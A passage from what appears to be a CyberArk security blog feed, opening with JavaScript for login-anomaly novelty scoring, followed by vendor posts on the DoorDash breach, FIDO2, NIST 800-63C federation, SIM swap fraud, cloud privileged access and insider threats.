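// One-hot encoding: one 0/1 column per (field, value) pair; an unseen value encodes as all zeros.
function oneHot(event, vocab) {
  const vec = [];
  for (const f of FIELDS) for (const v of vocab[f]) vec.push(event[f] === v ? 1 : 0);
  return vec;
}

// A user's profile is the mean of their one-hot vectors, i.e. how often each value was seen.
function buildProfiles(events, vocab) {
  const vectors = {};
  for (const e of events) {
    if (!vectors[e.user]) vectors[e.user] = [];
    vectors[e.user].push(oneHot(e, vocab));
  }
  const profiles = {};
  for (const [user, vs] of Object.entries(vectors)) {
    profiles[user] = vs[0].map((_, i) => vs.reduce((sum, v) => sum + v[i], 0) / vs.length);
  }
  return profiles;
}

// Novelty: fraction of fields whose value this user has shown in fewer than `rare` of past events.
// A value absent from the vocabulary altogether counts as novel.
function novelty(event, profile, vocab, rare = 0.1) {
  let novel = 0;
  let offset = 0;
  for (const f of FIELDS) {
    const idx = vocab[f].indexOf(event[f]);
    const freq = idx === -1 ? 0 : profile[offset + idx];
    if (freq < rare) novel += 1;
    offset += vocab[f].length;
  }
  return novel / FIELDS.length;
}

// Score a raw event against the profiles; a user with no baseline is treated as fully novel.
function scoreEvent(rawEvent, profiles, vocab) {
  const e = withBucket(rawEvent);
  if (!profiles[e.user]) return 1;
  return novelty(e, profiles[e.user], vocab);
}
```

With the constructed data, a daytime login by alice from her usual laptop scores 0, while a 3 a.m. login from a new country on a desktop she has never used scores 0.75 (three of the four fields are novel; the app is not), which is the kind of signal the access-management policy can turn into a step-up or a block.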

What’s Next?

As you can see, what started as a seemingly simple looking high-level architecture, very quickly became a bit more complex as we kept adding more dimensions to the problem at hand. Now we can start talking about reducing all the complexities introduced by all the dimensions. In Data Science parlance, that’s called dimensionality reduction and is one of the most artistic and scientific steps, all at once. We’ll look into that in the next blog of this series, in which we’ll have fun with feature selection, dimensionality reduction leveraging such techniques as Principal Component Analysis (PCA).

Part 1 in this series

Part 3 in this series

DoorDash: Remote Vendor Access Security Goes Out the Window https://www.cyberark.com/blog/doordash-when-remote-vendor-access-security-goes-out-the-window/ Tue, 01 Oct 2019 16:04:14 +0000 https://www.cyberark.com/?p=74683

DoorDash, a popular food delivery service, recently suffered a data breach exposing sensitive data for nearly 5 million customers, workers and merchants. This breach is significant both in terms of scope and the types of personal information that were poached. This includes drivers’ licenses, credit card numbers and delivery addresses, as well as the usual names, emails and phone numbers.

Like others before it, this breach was discovered months after damage had already been done. The breach was only discovered when the company noticed unusual activity from a third party service provider. This is what lies at the heart of many breaches.

Many organizations today rely on third parties, like contractors, partners or other technology and service providers, for critical IT operations. As part of this contracted work, third party vendors require remote access to sensitive internal resources. However, the current set of solutions that provide and provision proper privileged access leave much to be desired.

Since their inception in the mid-1990s, organizations have relied on Virtual Private Networks (VPNs). Unfortunately, VPNs extend network access to authenticated users and allow access to resources beyond what users need to do their jobs.

VPNs were invented before smartphones, bring-your-own-device and remote work were as commonplace and widespread as they are today. They weren’t intended to provide role-based access, which is key to limiting remote vendor access without interfering in their ability to work. A modern solution is required for this modern problem.

Understanding Remote Vendor Management

DoorDash announced that, moving forward, it would block access for unauthorized users, encourage users to change passwords and improve the security protocols that allow third party vendors to access its internal systems. However, it’s not clear, specifically, how DoorDash plans to do so.

Here are four actionable steps an organization can take to reduce the risk from remote vendor access.

  1. Implement and consistently enforce strict controls regarding who is able to access critical internal resources that house sensitive information.
  2. Enable alerting and response to anomalous behavior or activity by improving the visibility into the privilege-related events occurring in the network, such as who is accessing what resources.
  3. Implement automatic provisioning and de-provisioning processes. With this in place, third party vendors can only access the systems that they require for their jobs.
  4. Implement secure multi-factor authentication methods to verify identity of third party vendors.

Learn about securing remote vendor access without the need for VPNs, agents or passwords. Watch a video about CyberArk Alero or request a demo of CyberArk Alero. Join us on 5 November for a webinar on Alero and securing third party access.

CyberArk Privilege Cloud Now Available on AWS Marketplace https://www.cyberark.com/blog/cyberark-privilege-cloud-now-available-on-aws-marketplace/ Thu, 26 Sep 2019 13:00:34 +0000 https://www.cyberark.com/?p=74560

CyberArk is pleased to announce that our as-a-service CyberArk Privilege Cloud offering is now available on Amazon Web Services (AWS) Marketplace. CyberArk Privilege Cloud is a SaaS offering built to protect, control and monitor privileged access across on-premises, cloud and hybrid infrastructures.

Designed from the ground up for security, CyberArk Privilege Cloud helps organizations efficiently manage privileged account credentials and access rights, proactively monitor and control privileged account activity and quickly respond to threats. This added security comes without the need to manage additional on-premises infrastructure, so organizations can focus on their core competencies.

 

CyberArk Privilege Cloud: Privileged Access Management Now Available on AWS Marketplace

The availability of CyberArk Privilege Cloud marks the fourth CyberArk offering to be available on AWS Marketplace, joining Conjur Open Source, the CyberArk Privileged Access Security Solution and the CyberArk Privileged Access Security Solution for GovCloud – reinforcing the depth of the CyberArk relationship with AWS.

CyberArk is the trusted leader in privileged access management, helping the world’s leading organizations to protect against external attackers and malicious insiders in the cloud, on-premises and everywhere in between. Organizations use CyberArk solutions to protect the cloud workloads they deploy and run on AWS, securing their privileged accounts and credentials at each stage of their cloud journey.

CyberArk Privilege Cloud supports several integrations with AWS that bolster security for organizations’ cloud assets, including the AWS Security Token Service (STS) and Amazon Inspector. CyberArk Privilege Cloud customers can also download the AWS automatic onboarding solution from our public GitHub, which uses AWS CloudWatch events to detect newly provisioned EC2 instances and automatically onboards and manages their privileged accounts.

To check out the CyberArk solutions available for download and purchase on AWS Marketplace, click here!

In Digital Business, Don’t Sacrifice Security for Speed https://www.cyberark.com/blog/in-digital-business-dont-sacrifice-security-for-speed/ Tue, 24 Sep 2019 14:27:38 +0000 https://www.cyberark.com/?p=74499

Today’s businesses must move at the speed of innovation to remain relevant. That means embracing digital technologies and processes – from cloud computing and software-as-a-service (SaaS) models to DevOps and robotic process automation (RPA) – to help deliver products and services to market faster. But this “need for speed” and shorter feedback loops can introduce a host of new risks.

A survey of cybersecurity professionals conducted at InfoSecurity Europe 2019 underscores this problem. The study shows that 34 percent of organizations have bypassed important security steps in order to get products out to market faster. As a result, a staggering 64 percent believe that their customers could “easily be breached” as a direct result of unpatched vulnerabilities in their organizations’ products and applications. Here’s our take on some of the survey’s key findings, along with some insights from our CISO View panel of Global 1000 CISOs.

Cloud applications abound in digital businesses, but security is low priority. According to the survey, nearly half of the organizations (49 percent) are currently running more than half of their applications in the cloud. Yet many organizations are not prioritizing the protection of the applications that they deploy – or those they depend on to keep business in business.

 A recent CyberArk study shows that nearly 70 percent of organizations do not secure business critical applications, such as ERP and CRM systems, any differently than they secure low-value applications or services. As cloud applications proliferate, organizations must take steps to protect what attackers target most: privileged access. This means locking down the powerful human and application-to-application credentials used by SaaS applications and cloud-native applications built using DevOps methodologies to reduce the risk of an attack.

Security and development teams must align; application security must adapt. The vast majority of respondents (92 percent) agreed that having security test products and applications was important. However, 39 percent admitted that security is not involved at the beginning of the application development cycle.

 Traditionally, security teams could come in toward the end of the game and put up “gates” to ensure that applications were tested and met various security requirements before being released. But with the dawn of continuous application delivery, these gates are gone. Today, security teams must take the lead in aligning with DevOps teams and DevOps culture. Security teams need to work with development and operations to integrate security into modern processes from the start.

When it comes to application security testing, security teams should work to automate as many application testing and scanning processes as possible and incentivize manual testing efforts through creative initiatives like bug bounty programs. They should also conduct regular Red Team exercises to identify weaknesses that automation may miss. Check out in-depth recommendations for adapting security processes for modern application testing.

 Zero Trust can break the cycle of security failure. The InfoSecurity survey shows that 37 percent of organizations have already experienced attacks that could compromise their data and applications in the cloud. According to industry experts, nearly all cyber attacks involve privileged access. As organizations increasingly operate in cloud-first environments, access is not limited to the network and the perimeter is no longer defensible.

 This means that security strategies must shift to protecting what’s most important—from within. Zero Trust security models are making this possible. With Zero Trust, organizations trust nothing and verify everything, whether it comes from inside or outside the network perimeter, before granting access. By practicing defense-in-depth and incorporating privileged access management controls at the core of their strategy, organizations can implement a Zero Trust framework that helps to drive down risk while maintaining business velocity.

For example, the CyberArk Global Advanced Threat Landscape 2019 Report revealed that less than half of organizations have a privileged access management strategy in place for DevOps, IoT, RPA and other technologies foundational to digital initiatives. This creates a perfect opportunity for attackers to exploit legitimate privileged access.

No matter the digital transformation strategy, security must be a critical consideration from the beginning. This industry study illustrates the risks of embarking on new digital programs without a solid security foundation in place.

The CISO View report on Protecting Privileged Access in DevOps and Cloud Environments tackles many of these challenges and offers practical guidance for effectively reducing risk in modern environments—from CISOs who have been there. Download the report to learn more.

Ecuador Data Breach the Result of Cloud Vulnerability https://www.cyberark.com/blog/ecuador-data-breach-the-result-of-cloud-vulnerability/ Wed, 18 Sep 2019 13:31:38 +0000 https://www.cyberark.com/?p=74081

A recently discovered breach exposed data on almost every one of Ecuador’s approximately 17 million citizens, including 6.7 million children. Aside from the scale, this breach is making front-page news for the sheer breadth of exposed information. The exposed files contained official government ID numbers, phone numbers, family records, marriage dates, education histories and work records.

This breach was made possible by an unsecured Elasticsearch server hosted on AWS, where Ecuador currently stores some of its data, rather than by a flaw in AWS itself. It reinforces the importance of understanding the security controls a chosen cloud provider has in place and what organizations themselves must do to augment those policies and procedures.

Most cloud providers operate under a shared responsibility model, where the provider handles security up to a point and, beyond that, it becomes the responsibility of those using the service. Public cloud providers provide straightforward guidance on their shared responsibility models for security and compliance in cloud environments, but the unfortunate reality is that this guidance often gets ignored.

In fact, recent data from the CyberArk annual Global Advanced Threat Landscape report found that 75% of respondents rely primarily on cloud providers’ built-in security, and around half of organizations don’t have a strategy in place for securing privileged data and assets in the cloud. This represents an open door for malicious actors.

Ecuador isn’t the only government to expose its citizens’ data through an unsecured cloud server and probably won’t be the last.  A similar Elasticsearch server exposed the voter records of approximately 14.3 million people in Chile, around 80% of its population.

As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.

Go Passwordless with FIDO2 and Web Authentication https://www.cyberark.com/blog/go-passwordless-with-fido2-and-web-authentication/ Tue, 17 Sep 2019 14:41:04 +0000 https://www.cyberark.com/?p=98993


Passwords are a huge pain in the a$$. They have enormous disadvantages:

  1. It’s not practical nor possible to remember complex passwords for all the services one uses, so people routinely use the same password everywhere, or worse, use guessable passwords, such as “password” or “12345”, resulting in easy account breaches.
  2. Some services require their users to change passwords frequently, causing people to create patterns, which are again, easy to guess and subsequently hacked into these accounts.
  3. People forget them and then get locked out of their accounts, which is of course a loss of productivity.
Comic: Source: dilbert.com

Jokes aside, solutions like MFA address some of this, but alongside them, strong passwordless authentication is the most convenient solution from a user-experience standpoint and an important secular trend every security professional must track closely.

There are several authentication methods beyond passwords that fall on different levels of security-convenience spectrum. In the last few years, smartphones have played a huge role in popularizing biometric methods like fingerprint scanning and facial recognition, but they tend to have inconsistent security profiles across platforms and devices.

For enterprise apps, you need a guarantee of strong security for every authentication method used on every employee’s device for every app. This is especially tricky in today’s perimeter-less and BYOD world with diverse platforms.

This is the purpose for which the FIDO Alliance was formed, launching publicly in 2013. The first version of the FIDO standard, FIDO U2F, was, as its name suggests, fundamentally designed as a second-factor authentication method, so it can’t be used for a passwordless experience. FIDO2 is the latest set of specifications, comprising Web Authentication (aka WebAuthn) and CTAP2, that strive to standardize and leverage strong biometric authentication methods on different devices, such as Windows Hello and Android biometrics, as well as hardware tokens like YubiKey, so that users get a passwordless user experience and interoperability between platforms without losing out on convenience, privacy and, most importantly, security.

In FIDO2 authentication, the biometric information on the user’s device or the private key stored in a FIDO2 token never leaves the device, and the relying party stores only a public key for a credential bound to its own origin. That makes it a very secure authentication method, resistant to phishing (a credential registered for one origin will not answer a challenge relayed from a look-alike site) and to server-side breaches (there is no shared secret on the server to steal). It can be used as a single (passwordless) strong authentication method, in conjunction with a local PIN (to prevent access using a stolen key), or as a secondary authentication factor just like U2F.

passwordless2
FIDO2 Authentication Process, Source: FIDO Alliance

It’s a work in progress though, with some platforms still catching up. Apple hasn’t yet announced support for leveraging Face ID in CTAP2, but Safari now supports FIDO2-compliant USB keys (like YubiKey) on macOS. Chrome, Firefox and Edge have supported FIDO2 for a while now.

It’s quite clear that if anyone is going to kill the Thanos of identity world (the password of course), it’s going to be an interoperable and secure standard like FIDO2. Stay tuned for more updates on this soon!

Breaking the Cycle of Security Failure with Zero Trust https://www.cyberark.com/blog/breaking-the-cycle-of-security-failure-with-zero-trust/ Tue, 17 Sep 2019 13:00:33 +0000 https://www.cyberark.com/?p=74069 Zero Trust

It is widely accepted by IT security decision makers that the network perimeter is no longer defensible. Today’s technology ecosystem, made more complex by digital transformation, necessitates adjustments to traditional security strategies.

At the CyberArk Impact 2019 event in Chicago, Dr. Chase Cunningham, principal analyst at Forrester Research, delivered a compelling keynote focused on how applying Zero Trust concepts are changing the game and breaking the long-standing cycle of security failure. With Zero Trust, organizations trust nothing and verify everything, whether it comes from inside or outside their perimeters, before granting access.

As a former Navy chief with more than 19 years’ experience in cyberforensics and cyberanalytic operations, Cunningham offers direct, insightful perspectives from the front lines of cybersecurity on:

  • The current state of cybersecurity
  • Digital Transformation and the “death of the password”
  • The critical role of privileged access in enabling Zero Trust to strategically address the threat of lateral movement
  • Best practices for building out modern security architectures and capabilities that align with Zero Trust frameworks

Watch the full video here:

 

 

Learn more about Zero Trust models in our two-part blog: “The Evolution of Perimeter Security” and “The Evolution of Trust and Five Key Considerations.”

How to Secure Cloud Based Applications and Infrastructure https://www.cyberark.com/blog/best-practices-for-securing-cloud-based-applications-and-infrastructure/ Thu, 12 Sep 2019 16:13:29 +0000 https://www.cyberark.com/?p=73920

If one thing’s for certain, it’s that public cloud adoption is not going away or slowing down. Today, 94 percent of global organizations use cloud services. Sixty-one percent of public cloud users leverage Amazon Web Services (AWS), 52 percent use Azure and 19 percent use Google Cloud – and these numbers are climbing fast. Fueled by top-down digital transformation initiatives and bottom-up pushes to streamline development processes, even heavily regulated organizations like financial services and healthcare are accelerating their adoption cycles.

Frequently, these cloud initiatives are well underway before security gets involved. But, cloud architecture and DevOps teams often lack the expertise to adequately address the risks associated with privileged access, and they often do not make security a priority given their mandate to bring new digital services to market quickly. That’s why it’s critical for security teams to collaborate in integrating security before poor practices become entrenched. (We cover this in-depth in the CISO View: Protecting Privileged Access in DevOps and Cloud Environments).

We recently hosted a webinar on best practices for securing commercial software-as-a-service (SaaS) applications, cloud infrastructure, and custom apps deployed in the cloud, which we illustrated through a series of real-world CyberArk customer use cases. Following are highlights. Tune in to the on-demand webinar for full technical details and an informative Q&A.

The Power of Privilege in the Cloud

While organizations’ infrastructures are increasingly becoming cloud-based, some things remain the same. Attackers still seek the path of least resistance and privileged access management (PAM) is still vital to securing the attack path.

The Original Way: On-Premises Cyber Attack

During a traditional on-premises breach, a cyber attacker looks for ways to compromise a user, which often starts with an attack on the endpoint. For instance, an attacker could start with phishing (who doesn’t love a great cat video?!) to get their hands on privileged credentials. Once the stolen privileged credentials are in hand, they could move laterally through the network, escalating privileges and work their way up to then owning a domain.

The New Way: Cloud Cyber Attack

In modern cloud environments, an attacker can save a number of steps by compromising one privileged user and then leverage this access to compromise, for example, a cloud management console. By hijacking these types of privileged credentials, attackers can shut down the cloud environment.

While it’s impossible to say whether the cloud is more or less secure than on-premises, misconfigurations across these open, more centralized environments can ripple in an exponential way that you don’t see in traditional deployments. So, securing privilege in the cloud has become an enterprise imperative.

Figure: The old (on-premises) and new (cloud) methods for executing a cyber attack

Identifying Quick Wins for Extending Privileged Access Management into the Cloud: Three Real-World CyberArk Use Cases

Use Case 1: Securing Root and Privileged Access into Cloud Management Consoles

The Situation: A global financial services institution’s cloud team deployed to AWS and Azure six months ahead of any security oversight. By the time the security team received the request to secure the new environment, workflows had already been established, making it difficult to change anything. The good news, however, was that the cloud architecture team had placed multi-factor authentication (MFA) in front of their AWS and Azure root accounts, an important security best practice.

In this multi-cloud AWS and Azure environment, every single admin member on the cloud team had their own AWS identity and access management (IAM) accounts, with mapped roles for administrative access. This translated to a large number of both roles and accounts that they needed to manage. For Microsoft Azure, they were using Azure AD Connect to integrate with their on-premises Active Directory. Non-human application access into the cloud was not being managed at all.

The Challenge: The biggest challenge the security team faced was securing the cloud root accounts for AWS and Azure. In on-premises environments, securing these accounts with CyberArk would involve MFA, password rotation and enforcement. But, in cloud environments, MFA is already present and rotation happens using the UI. So, the security team initially considered two choices for automatic rotation:

  1. Use CyberArk to control and monitor access to the root account, then enable manual rotation policies and external MFA.
  2. Manage and rotate passwords within CyberArk and add customizations when the cloud provider updates the UI.

The Solution: While both of the above approaches work, this organization chose a more pragmatic approach. They used CyberArk Privileged Access Security Solution to vault their root accounts (20 total) and leveraged CyberArk as a point of access and audit control. Then they used the CyberArk solution to isolate and monitor user connections and evaluate risk. By vaulting the root account, using the native cloud MFA and implementing monthly manual rotation, the security team freed up valuable time to focus on implementing additional controls around privileged roles.

Use Case 2: Extending Password Vaulting and Rotation to Integrated Automation and Security Tools

The Situation: Application credentials typically outnumber human accounts, so controlling, managing and auditing non-human privileged access for these applications is no small feat. Two of our telecommunications customers – one a global enterprise, the other a regional provider – took a similar approach to securing the application credentials of their cloud-native apps.

Both of these organizations leveraged native secret stores provided by their cloud, DevOps and Robotic Process Automation (RPA) vendors. This led to a heavily fragmented approach and “islands of security.” When the security team was asked to help secure these applications, the main questions were: Where exactly do these secrets live, and who is responsible for rotating them?

The good news is that both organizations were already using the CyberArk solution for their J2EE application servers. Additionally, they were using hash authentication, a powerful form of application authentication that validates whether or not an application has changed based on the hash of the entire stack or certain classes within the stack.

Challenge: Both organizations were seeking centralization, but the development teams – laser focused on high velocity, code sharing, ad-hoc tooling and full-on automation – were not interested. The new cloud security project didn’t just have to solve the problem, but most importantly, the security team had to get the developers on board.

Solution: When you have so many applications, focus becomes paramount. These organizations prioritized removing application secrets for RPA for Phase 1. This step had the advantage of cross-team visibility, adoption and the ability to achieve quick wins – useful for demonstrating benefits to developers. From there, they began the process of migrating to a shared services security model, with the end goal being that non-security teams would provide internal financing for cybersecurity projects. This had the added effect of creating cross-functional teams. By establishing cross-functional teams, they brought DevOps and security teams into alignment and fostered collaboration for stronger overall security.

Use Case 3: Scaling CyberArk Deployments in the Cloud

Situation: Brand loyalty used to be huge for cloud. This has shifted, and today, multi-cloud environments are the name of the game. One technology provider we worked with had a tri-cloud environment comprising AWS, Azure and a private cloud. Cloud usage had skyrocketed in a short period of time, leading to a huge number of accounts and instance sprawl.

Challenge: The company was onboarding the credentials for new EC2 instances and Azure VMs to CyberArk using a manual and time-consuming process. In fact, each person requesting an instance had to fill out a written form. Automation was critical – and this need was compounded by the fact that their on-premises assets were soon going away. The team turned their focus towards streamlining this process significantly.

Solution: The company leveraged the CyberArk REST API to onboard new cloud artifacts and trigger rotation and began using the same API to perform de-provisioning. As part of their privileged access management journey, they are currently evaluating additional automation and intelligence, including the auto-onboarding AWS Lambda function and the CyberArk solution’s ability to detect and onboard newly created shadow access keys and IAM accounts.

Interested in learning more about how CyberArk can help you secure cloud-based applications and cloud-based infrastructure and move your digital business forward fearlessly? Check out the full on-demand webinar.


]]>
NIST 800-63-C: Federated Assurance Level Guidelines https://www.cyberark.com/blog/nist-800-63-c-federated-assurance-level-guidelines/ Wed, 11 Sep 2019 15:25:21 +0000 https://www.cyberark.com/?p=99129

This is part four of a blog series on NIST 800-63c guidelines on Digital Identity. This blog focuses on part “c” of the standard – NIST 800-63c – and focuses on Federations and Assertions.

It’s taken longer than I would’ve liked, but I finally completed part four of my series on NIST-800-63-3 guidelines on Digital Identity. Part one provides an introduction and overview of the overall guidelines, part two goes in-depth into the Enrollment and Identity Proofing, while part three talks about Authentication and Lifecycle Management guidelines.

This blog focuses on part “c” of the standard – NIST 800-63c – and focuses on Federations and Assertions. As a leader in the Identity as a Service (IDaaS) market, supporting this standard effectively happens to be one of Idaptive’s strengths. This standard, and the document detailing it (like the other documents), is incredibly comprehensive and complete in its coverage of federation standards. While this blog isn’t a summary of the entire document, it focuses on a few parts of it that may be relevant to an interested newbie.

So, what really is “Federation”?

The NIST document defines federation as “a process that allows for the conveyance of authentication and subscriber attribute information across networked systems.” In simple terms, federation means the process of sending information from one system to another system (the second system trusting the first system) that “confirms” a user has been authenticated, along with other information (attributes) related to the authenticated user. The system that authenticates the user is called the Identity Provider, or IdP, and the system that trusts the IdP is called the Relying Party, or RP. The information conveyed from the IdP to the RP is often in the form of a concept called “assertion”. Information contained in the assertion is then used by the RP to determine and enforce access privileges. The authentication that happens between the user and the IdP relies on the 800-63b standard.

Figure 1 (Source: NIST-800-63-C): Anatomy of a Federation scenario

In a federation scenario, the IdP and the RPs that consume the IdP services are referred to as members of a federation.

Assertions? ELI5 what that means…

Think of an assertion as a ‘FedEx package’ sent from the IdP to the RP (electronically, of course) that contains a variety of information about the authenticated user, along with other information that the RP can use. The primary purpose of an assertion is to authenticate the user to the RP, but the information in the assertion can be used by the RP for a variety of uses such as allowing the user to see the admin pages of the website, or personalization of the website for the user.

Federated Assurance Levels or FALs

As with the other guidelines, this document too does a great job of explaining the three levels of assurance related to Federation. Below is a table summarizing the three levels:

[Table image (Source: NIST-800-63-C): summary of the three Federated Assurance Levels]

FAL 1 simply maps to the OpenID Connect Basic Client Profile or the Security Assertion Markup Language (SAML) Web SSO Artifact Binding profile. FAL 2 requires that the assertion (OIDC token or SAML assertion) is encrypted with a public key representing the RP. And FAL 3 requires that the user authenticating against the IdP does so with a cryptographic authenticator. Idaptive supports all three FALs in its product through its support for the OIDC and SAML standards, its ability to encrypt SAML assertions, and its ability to enforce multi-factor authentication using cryptographic methods for the end user during the process of authenticating to the Idaptive IdP.

Federation Proxies – now this gets interesting!

An interesting concept explained in the NIST document is the idea of Federation Proxies. I’ve heard people refer to this concept in many ways – IdP Chaining, IdP Delegation, etc. Essentially, this concept refers to a scenario where communication between the IdP and the RP is intermediated via a third party that prevents direct communication between the two parties. A common way of achieving this is with a third party that acts as a federation proxy or a broker. Below is a diagram that illustrates that concept:

Figure 2 (Source: NIST-800-63-C): Federation Proxy

Idaptive can be leveraged in this model, where it acts as a proxy between an IdP and an RP. In this model, the end user will still authenticate against the IdP, but her assertion will be proxied through Idaptive to the RP, which then signs the user in. Interestingly, many of our customers are starting to use this model as a way of incrementally migrating away from legacy IdPs to Idaptive. This model ensures minimal disruption to the end user, since they continue authenticating to their old IdP and login portal, while ensuring that modern federation systems like Idaptive are deployed to work with their applications (RPs). Idaptive does this really well – we have the ability to dynamically chain to other IdPs based on user attributes such as username suffixes.

So, where does SAML fit in?

Now SAML, as a standard, is comprehensive enough for multiple individuals to do their PhDs in, but I’ll use this forum to very briefly introduce this concept in simple terms.

SAML, which stands for Security Assertion Markup Language, and OIDC, which stands for OpenID Connect, are two of the most common federation standards in the market. SAML is an XML framework for creating and exchanging authentication and attribute information between trusted entities over the internet. The SAML standard defines:

  • Assertions XML Schema: the structure of the assertion
  • SAML Protocols: the interaction sequences that are used to request assertions and artifacts
  • SAML Bindings: the underlying communication protocols that can be used to transport SAML assertions.

The three components above together define a SAML profile – an example of which is “Web Browser SSO” or “Service Provider (RP) Initiated SSO”. A typical SAML assertion, sent from an IdP to an RP, is encoded as XML and can carry three types of statements:

  • Authentication Statement: includes information about who has issued the assertion, the user for which the assertion was issued, its validity period and other authentication information.
  • Attribute Statement: includes additional information related to the user, examples of which could be “roles” or “departments”.
  • Authorization Statement: includes information on what resources the user has the rights or privileges to access, such as files, devices, web pages within a website, etc.

Looking for Federation technologies?

At Idaptive, support for federation scenarios leveraging open standards has been one of the cornerstones of our cloud service since its inception. Idaptive has invested heavily in ensuring that scenarios such as IdP-initiated or SP-initiated SSO and IdP proxying or chaining, as well as standards like SAML, OIDC, OAuth 2.0, etc., are supported, whether for workforce, partner or customer users. Additionally, we have over 2000 apps in our app catalog, many of which are SAML, OIDC and OAuth 2.0 based applications. And for applications for which we do not have built-in out-of-the-box templates, you can always use our application integration wizards, which will guide you through the process of customizing and enabling a new application for SSO. If you’re interested in learning more, please do not hesitate to try our service for free here or reach out to us directly.


]]>
“SIM Swap” and Its Effects on SMS Based Authentication https://www.cyberark.com/blog/sim-swap-and-its-effects-on-sms-based-authentication/ Tue, 10 Sep 2019 18:32:16 +0000 https://www.cyberark.com/?p=98890

Many of you might be aware of the latest and most high-profile account takeover, that of Twitter chief executive Jack Dorsey, which led to a set of offensive tweets and retweets from his Twitter account. Security analysts have blamed this takeover on the so-called “SIM Swap” fraud, where a hacker obtains the victim’s personal data through phishing techniques and uses this information to convince a mobile provider to switch the number associated with a SIM card to another, unauthorized device. As a result, all calls and texts to the victim’s number are routed to the hacker’s phone, including SMS based one-time passwords, potentially causing people to lose control of not only their enterprise and social media accounts, but their bank accounts and other sensitive information.

SIM Swap attacks using SMS based one-time passcodes appear to be the primary reason behind many reports of fraudsters draining thousands of dollars out of victims’ checking accounts, a recent string of embarrassing Instagram takeovers, and losses of cryptocurrencies that have led to multi-million-dollar lawsuits. Fake tweets from prominent leaders’ accounts can have devastating consequences, resulting in lasting reputation damage and loss of trust, resources, time and money. Such instances of fraud only reinforce why the U.S. National Institute of Standards and Technology (NIST) announced in July 2016 that organizations should no longer send one time passwords to mobile phones. Though NIST changed the status of SMS from “deprecated” to “restricted” in 2017, it still strongly recommends that organizations stop using SMS 2FA, as this is an insecure method that relies only on the phone number and not the device itself.

As providers of centralized access to enterprise and consumer apps and resources, Identity and Access Management (IAM) vendors play a crucial role in providing controls to detect and remediate such account takeovers. To address security concerns, organizations have typically employed overly restrictive IAM controls (such as enforcing stronger password policies, knowledge-based responses, etc.), resulting in a painful user experience. OTP based systems like SMS, smartphone-based codes, and FIDO based tokens were designed to improve the overall user experience without compromising security, but were often driven by static rules that again impacted the user experience.

While such factors offer better alternatives to SMS based authentication codes, a much better solution to address SIM Swap fraud would be an intelligent and dynamic authentication solution that can continuously analyze user and device context and require stronger factors only as needed. Such technology solutions can constantly capture the fingerprint of each enrolled device, including SIM card data, device type and geo-location information, and obtain SIM porting history data (when a user activated their current SIM card or last ported their number) and carrier related data from 3rd party vendors. This rich set of data, along with behavioral biometrics (passive factors such as typing speed, device orientation, etc.), can then be fed into an artificial intelligence powered analytics engine that uses machine learning algorithms to assess risk based on constantly evolving user behavior patterns. Any authentication or forgotten-password attempt from a SIM swapped device can flag the user as risky, prevent any subsequent authentication attempts, and alert users of fraudulent activity. For instance, when a device context mismatch indicates a low or moderate threat of SIM swap fraud, IAM systems can determine whether to deliver the one-time password via SMS, require a stronger verification factor such as a smartphone-based OTP or FIDO U2F token, or deny the password reset request altogether.

Despite multiple reports of SIM Swap attacks and NIST recommendations, most organizations and users still rely on SMS authentication as their primary out-of-band authentication method for allowing secure transactions. With fraudsters continuing to exploit this weakness in SMS, employing better authentication processes with minimal impact to users is vital to improving the security posture of any organization.

Click here to learn about Idaptive’s Zero Trust IAM solution, which verifies every user, validates their devices, and intelligently limits their access to apps and endpoints. Idaptive also utilizes machine learning to discover risky user behavior and apply conditional access — without impacting user experience.

]]>
September Is Insider Threat Awareness Month: Are You Ready? https://www.cyberark.com/blog/september-is-insider-threat-awareness-month-are-you-ready/ Tue, 10 Sep 2019 13:56:22 +0000 https://www.cyberark.com/?p=73723

The U.S. National Counterintelligence and Security Center (NCSC) and the National Insider Threat Task Force (NITTF) have declared September National Insider Threat Awareness Month. This is part of a concerted effort to educate government agencies and private sector organizations on, according to their press release, the “serious risks posed by insider threats, while encouraging employees to recognize and report anomalous activities so early intervention can occur.”

According to the Verizon Insider Threat Report, 20 percent of cybersecurity incidents and 15 percent of data breaches originated with “insiders” to the organization. While they don’t happen as frequently as external attacks, insider attacks can be extremely costly and difficult to prevent and detect.

That’s because insiders already know the network environment and often already have access to sensitive information. They can stealthily exploit privileged access to critical systems and move laterally through systems without raising any red flags. As a result, insider attacks can continue for months – or even years – before being discovered.

This new NCSC initiative is an important step in raising awareness and helping organizations develop proactive strategies for combating and detecting insider threats and reducing the risk of privilege compromise. Throughout the month, the NCSC, NITTF and partnering government agencies will host a series of events that highlight the importance of safeguarding the nation from insider threats and best practices for mitigating insider risks. Visit the Center for Development of Security Excellence to participate in cyber awareness trainings and eLearning or access informative cybersecurity resources.

Who Is the Insider Threat?

William Evanina, director of the NCSC, explained, “All organizations are vulnerable to insider threats from employees who may use their authorized access to facilities, personnel or information to harm their organizations – intentionally or unintentionally.”

While their motivations vary, CyberArk believes insider threats can typically be classified into four major groups:

  1. The External Insider. In the digital transformation age, integration with vendors and remote workers is critical. But, each of these partners – from contractors and agencies to IT service providers and attorneys – needs access to sensitive data to do their jobs. Since you can’t control what you don’t own, this creates a major gap in cybersecurity defenses: unmanaged remote vendor access can lead to negative audit findings and serious data breaches.
  2. The Exploited Insider. Cyber attackers commonly target employees with privileged access like sysadmins, IT help desk teams and executives. In fact, according to the Verizon Insider Threat Report, 33 percent of breaches involve social attacks such as phishing, spoofing or reverse social engineering attacks via social media. It only takes one victim and one compromised endpoint for an attacker to establish a foothold inside an organization.
  3. The Malicious Insider. Malicious insiders are motivated by anger, financial struggles, political activism, thrill-seeking and more. They are not always easy to pinpoint, because, typically, they can bypass security measures as “trusted users” to obtain what they’re after. Their actions put enterprise and government missions, dollars – and sometimes even lives – at risk.
  4. The Unintentional Insider. Humans are, well, human. They make mistakes. Most employees are not out to steal sensitive information. They’re simply trying to do their jobs. Sometimes these employees take actions that seem harmless to them, like installing unauthorized applications or using unapproved workarounds. But, this can put data and systems in harm’s way.

To reduce the risk of insider threats and limit the damage that they can do, organizations should implement privileged access management solutions that offer insider threat protection. The CyberArk Privileged Access Security Solution helps organizations proactively limit user privileges and control access to privileged accounts. It reduces the risk of an insider attack, while providing real-time threat analytics to aid in insider threat detection.

To explore the dangers hidden within your organization and learn five actionable recommendations for reducing the risk of insider threats, download our eBook, “Unmasking Insider Threats” or read our blog post, “Insider Threats Come in All Shapes and Sizes.”

]]>
